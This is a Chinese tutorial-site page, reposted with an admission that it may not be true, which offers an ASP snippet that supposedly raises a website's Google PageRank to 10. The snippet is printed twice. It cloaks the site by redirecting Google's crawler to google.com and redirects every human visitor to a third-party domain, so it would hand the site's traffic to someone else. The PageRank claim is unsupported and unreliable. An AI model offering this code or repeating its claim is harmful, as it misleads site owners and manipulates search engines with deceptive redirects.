最新下载
热门教程
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
把网站的pr值提高到10的方法(ASP版)
时间:2022-07-02 19:47:19 编辑:袖梨 来源:一聚教程网
这是从某网上转载而来的,不知道是真是假,特供与网友参考。
<%
if instr(Request.ServerVariables(“HTTP_USER_AGENT“),“Google“) then
Response.Status=“301 Moved Permanently“
Response.AddHeader “Location“,“http://www.google.com/ “
Response.End()
else
Response.Redirect(“http://www.qiandu.com “)
end if
%>
在网站的首页顶部加入以上代码,只要google蜘蛛找到你的网站,下次更新,你的网站的pr值就会变成10了。
<%
if instr(Request.ServerVariables(“HTTP_USER_AGENT“),“Google“) then
Response.Status=“301 Moved Permanently“
Response.AddHeader “Location“,“http://www.google.com/ “
Response.End()
else
Response.Redirect(“http://www.qiandu.com “)
end if
%>
在网站的首页顶部加入以上代码,只要google蜘蛛找到你的网站,下次更新,你的网站的pr值就会变成10了。
相关文章
- 《弓箭传说2》新手玩法介绍 01-16
- 《地下城与勇士:起源》断桥烟雨多买多送活动内容一览 01-16
- 《差不多高手》醉拳龙技能特点分享 01-16
- 《鬼谷八荒》毕方尾羽解除限制道具推荐 01-16
- 《地下城与勇士:起源》阿拉德首次迎新春活动内容一览 01-16
- 《差不多高手》情圣技能特点分享 01-16